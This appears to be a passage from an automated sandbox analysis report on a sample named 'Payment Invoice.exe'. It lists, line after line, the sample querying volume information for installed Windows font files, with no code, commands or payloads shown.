Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
